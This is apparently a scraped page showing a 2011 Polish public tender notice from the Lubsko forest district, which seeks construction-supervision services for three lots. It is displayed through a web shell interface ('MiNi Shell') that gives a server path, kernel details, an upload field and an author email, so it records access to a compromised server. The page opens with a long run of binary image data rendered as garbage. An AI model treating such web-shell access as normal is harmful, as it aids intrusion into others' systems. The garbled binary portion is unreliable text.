JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110308/38262-N-2011.html

<p class="kh_header"><b>Lubsko: Pełnienie obowiązków inspektora nadzoru inwestorskiego przy wykonywaniu robót budowlanych</b><br>
<b>Numer ogłoszenia: 38262 - 2011; data zamieszczenia: 08.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Lubsko , ul. Emili Plater 15, 68-300 Lubsko, woj. lubuskie, tel. 068 3720400 w. 34, faks 068 3720477.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.lubsko.zielonagora.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Nieposiadająca Osobowości Prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków inspektora nadzoru inwestorskiego przy wykonywaniu robót budowlanych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Nadzór inwestorski przy przebudowie wiaty na potrzeby stanowiska myjki sprzętu agrorolniczego z wymianą pokrycia ścian, budowie dwóch zbiorników technologicznych bezodpływowych, utwardzeniu placów dojazdowych oraz rozbiórce drewnianych obiektów magazynowych  na Szkółce Leśnej Marianka, działka nr 1175/1, obręb Jeziory Wysokie, gmina Brody. 
       Wartości zamówienia na roboty budowlane została ustalona na kwotę 197 879,00 zł. 
 netto.

Część II - Nadzór inwestorski przy budowie wielofunkcyjnego zbiornika wodnego 
w Leśnictwie Dąbrowa, dz. nr 82/2, przebudowie drogi i budowie placu z mijanką, budowie punktu czerpania wody z wodowskazem, obręb ewidencyjny Przyborowice, gm. Gubin oraz przy przebudowie wielofunkcyjnego zbiornika wodnego w Leśnictwie Jasień, budowie   placu manewrowego (mijanki), budowie punktu pożarowego czerpania wody i wodowskazu  
oraz urządzeń do napełniania i regulacji poziomu wody w zbiorniku na działkach nr 264 
 i 265 - obręb ewidencyjny Jasionna, gmina Jasień.
Wartości zamówienia na roboty budowlane została ustalona na kwotę 316 085,49 zł. netto.

  Cześć III - Nadzór inwestorski przy pracach związanych z rozbiórką istniejącego masztu antenowego o konstrukcji stalowej, w związku z budową nowego masztu przy siedzibie Nadleśnictwa  Lubsko w Lubsku, ul. E. Plater, dz. Nr 523, 530 
Wartości zamówienia na roboty budowlane została ustalona na kwotę 107 712,31 zł. netto.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, iż przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.54.10.00-2, 71.24.80.00-8, 71.24.40.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I i III - Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3
(trzech) lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał, co najmniej 1 (jedną) usługę nadzoru inwestorskiego nad robotami budowlanymi odpowiadającymi swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (w zakresie budowlanym i instalacyjnym), których wartość (wartość robót budowlanych) wynosiła minimum 200 000,00 zł brutto. Dla część II - Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3
(trzech) lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał, co najmniej 1 (jedną) usługę nadzoru inwestorskiego nad  robotami budowlanymi z zakresu budowy, przebudowy, remontu zbiorników wodnych 
z zastosowanie maty bentonitowej, których wartość (wartość robót budowlanych) wynosiła minimum 250 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wymaga spełnienia szczegółowych warunków dotyczących przedmiotowego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla częśc I i III - Zamawiający wymaga, aby Wykonawca dysponował osobami, posiadającymi ważne uprawnienia do kierowania i nadzorowania robotami o specjalności konstrukcyjno-budowlanej zgodne z ustawą Prawo budowlane z dnia 7 lipca 1994r. (tekst jednolity Dz.U. z 2010r. Nr 243, poz.1623) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 
 28 kwietnia 2006  roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006r. Nr 83,  poz. 578, z póź. zm.) lub równorzędne.
 Dla częśc II - -Zamawiający wymaga, aby Wykonawca dysponował osobami, posiadającymi ważne uprawnienia do kierowania i nadzorowania robotami o specjalności konstrukcyjno-budowlanej o specjalizacji obiekty budowlane melioracji    wodnych  zgodne z ustawą Prawo budowlane z dnia 7 lipca 1994r. (tekst jednolity Dz.U. z 2010r.
 Nr 243, poz.1623) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 
 28 kwietnia 2006  roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006r. Nr 83,  poz. 578, z póź. zm.) lub równorzędne.

    -  Zamawiający wymaga, aby Wykonawca sporządził wykaz osób w zakresie niezbędnym do
 wykazania spełniania warunku dysponowania osobami zdolnymi do wykonania 
 zamówienia, które będą uczestniczyć w wykonywaniu zamówienia w zakresie nadzoru nad robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i   wykształcenia, niezbędnych do wykonywania zamówienia; informacje
na temat kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Zamawiający wymaga, aby Wykonawca był ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności na kwotę nie niższą niż 200 000,00 zł. (dwieście tysięcy złotych),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto oferta powinna zawierać:
a.	wypełniony formularz ofertowy wg załączonego druku - załącznik nr 1 do SIWZ;
b.	wykaz części zamówienia, które Wykonawca zamierza zlecić Podwykonawcom,
c.	oryginał wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej
lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancji ubezpieczeniowej.
d.	pełnomocnictwo podmiotów występujących wspólnie (konsorcjum), ewentualnie pełnomocnictwo dla wspólnika spółki cywilnej o ile dokumenty składające się na ofertę nie są podpisane przez wszystkich wspólników.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1  ustawy każda ze stron może żądać wprowadzenia zmian w umowie w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jeśli wystąpi, co najmniej jedna z niżej wymienionych okoliczności:
1.	Jeżeli w trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia), niemożliwy do zauważenia przez Wykonawców w postępowaniu poprzedzającym wybór najkorzystniejszej oferty. 
2.	Z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą.
3.	Nastąpi wywierająca bezpośredni wpływ na dalsze wykonywanie umowy zmiana obowiązującego prawa powszechnego (np. ustawy, rozporządzenia) bądź przepisów wewnętrznych, obowiązujących w Państwowym Gospodarstwie Leśnym Lasy Państwowe (zarządzenia, decyzje i wytyczne Dyrektora Generalnego Lasów Państwowych).
4.	Wystąpi korzystna dla Zamawiającego możliwość zmiany przedmiotu zamówienia.
5.	Wystąpi zmiana Wykonawcy w przypadkach sukcesji generalnej następującej w wyniku dozwolonego przekształcenia podmiotu bądź dziedziczenia oraz w przypadkach szczególnej sukcesji z mocy prawa (np. łączenie, dzielenie, przekształcenie spółek).
6.	Wystąpi konieczność zmiany podwykonawcy, powierzenia wykonania części zakresu umowy podwykonawcy lub zmiany zakresu wykonania części zamówienia przez podwykonawcę.
7.	Wystąpi konieczność zmiany osób wykonujących samodzielne funkcje techniczne w budownictwie określone w art. 12 ustawy z dnia 7 lipca 1994 r. Prawo (tekst jednolity Dz.U. z 2010r. Nr 243, poz.1623)  
8.	Wystąpi konieczność zmiany (skrócenia lub wydłużenia) terminów umownych zakończenia umowy z uwagi na:
panujące niekorzystne warunki atmosferyczne,
udzielenie zamówień dodatkowych.
9.	W wyniku urzędowej zmiany stawki podatku VAT. Należny podatek VAT naliczony zostanie do ceny netto w fakturze wg stawki zgodnej z obowiązującym prawem w dniu wystawienia faktury, co nie dotyczy przypadków objęcia Wykonawcy, który w dniu podpisania umowy nie był płatnikiem VAT, obowiązkiem podatkowym w zakresie tego podatku.
10.	W razie zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia umowy, o charakterze działania siły wyższej, które uniemożliwiłyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu umowy. Warunkiem podpisania aneksu na przedłużony termin wykonania będzie zachowanie ciągłości zabezpieczenia, bez zmniejszenia jego wysokości. 
11.	Zamawiający dopuszcza zmianę terminu zakończenia pełnienia funkcji inspektora nadzoru inwestorskiego w przypadku zmiany terminu zakończenia robót budowlanych. Zmiana taka nie wpłynie na wysokość wynagrodzenia Inspektora nadzoru.
12. Zamawiający przewiduje możliwość zwiększenie lub zmniejszenie wynagrodzenia wybranego Wykonawcy - Inspektora Nadzoru Inwestorskiego, proporcjonalnie do wartości wybranej oferty wykonawcy robót budowlanych, w stosunku do kwoty  podanej przez Zamawiającego przed otwarciem ofert na wykonanie robót budowlanych. Zmiana wynagrodzenia nastąpi na pisemny wniosek Zamawiającego lub Wykonawcy i po spisaniu aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lubsko.zielonagora.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lasy Państwowe Nadleśnictwo Lubsko
68-300 Lubsko, ul. Emilii Plater 15
pok. nr 4 - SIWZ można otrzymać bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2011 godzina 09:00, miejsce: Ofertę należy złożyć w zamkniętej kopercie opisanej j.w. do dnia 16.03.2011 r., do godz. 9.00, w siedzibie Zamawiającego - Lubsko, 68-300,ul. E. Plater nr 15, w sekretariacie pokój nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I - Nadzór inwestorski przy przebudowie wiaty na potrzeby stanowiska myjki sprzętu agrorolniczego z wymianą pokrycia ścian, budowie dwóch zbiorników technologicznych bezodpływowych, utwardzeniu placów dojazdowych oraz rozbiórce drewnianych obiektów magazynowych  na Szkółce Leśnej Marianka, działka nr 1175/1, obręb Jeziory Wysokie, gmina Brody. 
        /netto/..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Nadzór inwestorski przy przebudowie wiaty na potrzeby stanowiska myjki sprzętu agrorolniczego z wymianą pokrycia ścian, budowie dwóch zbiorników technologicznych bezodpływowych, utwardzeniu placów dojazdowych oraz rozbiórce drewnianych obiektów magazynowych  na Szkółce Leśnej Marianka, działka nr 1175/1, obręb Jeziory Wysokie, gmina Brody. 
             Wartość zamówienia na roboty budowlane została ustalona na kwotę 197 879,00 zł. 
 /netto/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.54.10.00-2, 71.24.80.00-8, 71.24.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Nadzór inwestorski przy budowie wielofunkcyjnego zbiornika wodnego 
w Leśnictwie Dąbrowa, dz. nr 82/2, przebudowie drogi i budowie placu z mijanką, budowie punktu czerpania wody z wodowskazem, obręb ewidencyjny Przyborowice, gm. Gubin oraz przy przebudowie wielofunkcyjnego zbiornika wodnego w Leśnictwie Jasień, budowie   placu manewrowego (mijanki), budowie punktu pożarowego czerpania wody i wodowskazu  
oraz urządzeń do napełniania i regulacji poziomu wody w zbiorniku na działkach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Nadzór inwestorski przy budowie wielofunkcyjnego zbiornika wodnego 
w Leśnictwie Dąbrowa, dz. nr 82/2, przebudowie drogi i budowie placu z mijanką, budowie punktu czerpania wody z wodowskazem, obręb ewidencyjny Przyborowice, gm. Gubin oraz przy przebudowie wielofunkcyjnego zbiornika wodnego w Leśnictwie Jasień, budowie   placu manewrowego (mijanki), budowie punktu pożarowego czerpania wody i wodowskazu  
oraz urządzeń do napełniania i regulacji poziomu wody w zbiorniku na działkach nr 264 
 i 265 - obręb ewidencyjny Jasionna, gmina Jasień.
                Wartość zamówienia na roboty budowlane została ustalona na kwotę 316 085,49 zł. 
 /netto/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.54.00.00-9, 71.54.10.00-2, 71.24.80.00-8, 71.24.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2011.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cześć III - Nadzór inwestorski przy pracach związanych z rozbiórką istniejącego masztu antenowego o konstrukcji stalowej, w związku z budową nowego masztu przy siedzibie Nadleśnictwa  Lubsko w Lubsku, ul. E. Plater, dz. Nr 523, 530.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć III - Nadzór inwestorski przy pracach związanych z rozbiórką istniejącego masztu antenowego o konstrukcji stalowej, w związku z budową nowego masztu przy siedzibie Nadleśnictwa  Lubsko w Lubsku, ul. E. Plater, dz. Nr 523, 530 
              Wartość zamówienia na roboty budowlane została ustalona na kwotę 107 712,31 zł. 
 /netto/..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.54.10.00-2, 71.24.80.00-8, 71.24.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com